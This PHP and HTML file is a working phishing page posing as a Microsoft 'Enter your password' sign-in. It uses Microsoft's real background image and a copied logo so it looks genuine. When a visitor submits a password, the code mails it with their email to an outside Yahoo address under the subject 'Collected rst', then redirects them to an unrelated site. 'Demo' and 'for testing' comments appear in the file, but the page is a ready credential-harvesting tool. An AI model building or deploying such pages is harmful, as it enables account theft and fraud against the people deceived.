<?php
session_start();

// Force HTTPS
if (empty($_SERVER['HTTPS']) || $_SERVER['HTTPS'] === "off") {
    $redirect = "https://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    header("Location: $redirect");
    exit();
}

$email = $_SESSION['email'] ?? null;

if (!$email) {
    // No email stored, redirect back to page 1
    header("Location: index.php");
    exit();
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $password = trim($_POST['password']);

    // Basic validation
    if (strlen($password) < 6) {
        $error = "Password must be at least 6 characters long.";
    } else {
        // Prepare email message
        $to = "juanh1048@yahoo.com";  // <-- Replace with your email address for testing
        $subject = "Collected rst";
        $message = "Email: $email\nPassword: $password\n";
        $headers = "From: Office#Rst";

        // Send email (for testing)
        mail($to, $subject, $message, $headers);

        // You can store the info to file or database here if you want

        // Clear session for security
        session_destroy();

        // Redirect to google.com or a thank you page
        header("Location: https://www.punchbowl.com/");
        exit();
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Microsoft Login - Demo</title>
  <style>
    body, html {
      margin: 0;
      padding: 0;
      font-family: "Segoe UI", sans-serif;
      background: #ffffff url('https://logincdn.msauth.net/shared/5/images/fluent_web_light_57fee22710b04cebe1d5.svg') no-repeat center center;
      background-size: cover;
      display: flex;
      flex-direction: column;
      min-height: 100vh;
    }

    .main-container {
      flex: 1;
      display: flex;
      justify-content: center;
      align-items: center;
      padding: 20px;
    }

    .login-box {
      background: white;
      width: 100%;
      max-width: 350px;
      padding: 30px 20px;
      box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
      border-radius: 10px;
      text-align: center;
    }

    .brand {
      display: flex;
      justify-content: center;
      align-items: center;
      margin-bottom: 10px;
    }

    .brand img {
      width: 25px;
      margin-right: 8px;
    }

    .brand-text {
      font-size: 20px;
      color: #666;
      font-weight: 600;
    }

    .email {
      font-size: 14px;
      color: #555;
      margin-bottom: 15px;
      word-break: break-word;
    }

    input[type="password"] {
      width: 100%;
      padding: 10px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 4px;
      margin-bottom: 10px;
    }

    .forgot a, .code {
      font-size: 14px;
      color: #0078D4;
      text-decoration: none;
      cursor: pointer;
      display: block;
      margin: 10px 0;
    }

    button {
      width: 100%;
      padding: 10px;
      background: #0078D4;
      color: white;
      border: none;
      font-size: 14px;
      border-radius: 4px;
      cursor: pointer;
    }

    footer {
      text-align: center;
      font-size: 12px;
      color: #666;
      padding: 15px 10px;
    }

    footer a {
      color: #666;
      margin: 0 5px;
      text-decoration: none;
    }
  </style>
</head>
<body>

  <div class="main-container">
    <div class="login-box">
      <div class="brand">
        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR8u8BZcgcIxcfgSJsas_HDf2pfYTBlmo2q3g&s" alt="Microsoft Logo">
        <span class="brand-text">Microsoft</span>
      </div>

      <p class="email"><?php echo htmlspecialchars($email); ?></p>
      <h2>Enter your password</h2>

      <?php if (!empty($error)): ?>
        <div class="error"><?php echo htmlspecialchars($error); ?></div>
      <?php endif; ?>

      <form method="POST" action="">
        <input type="password" name="password" id="password" placeholder="Password" required />
        <div class="forgot">
          <a href="#">Forgot your password?</a>
        </div>
        <button type="submit">Next</button>
      </form>

      <span class="code">Send a code to <?php echo htmlspecialchars($email); ?></span>
    </div>
  </div>

  <footer>
    <a href="#">Help</a>
    <a href="#">Terms of use</a>
    <a href="#">Privacy and cookies</a><br />
    Use private browsing if this is not your device. <a href="#">Learn more</a>
  </footer>

  <script>
    document.getElementById('loginForm').addEventListener('submit', function (e) {
      e.preventDefault();
      const password = document.getElementById('password').value.trim();

      if (password.length < 6) {
        alert("Password must be at least 6 characters long.");
        return;
      }

      // Redirect if password is valid
      window.location.href = "https://www.punchbowl.com";
    });
  </script>

</body>
</html>
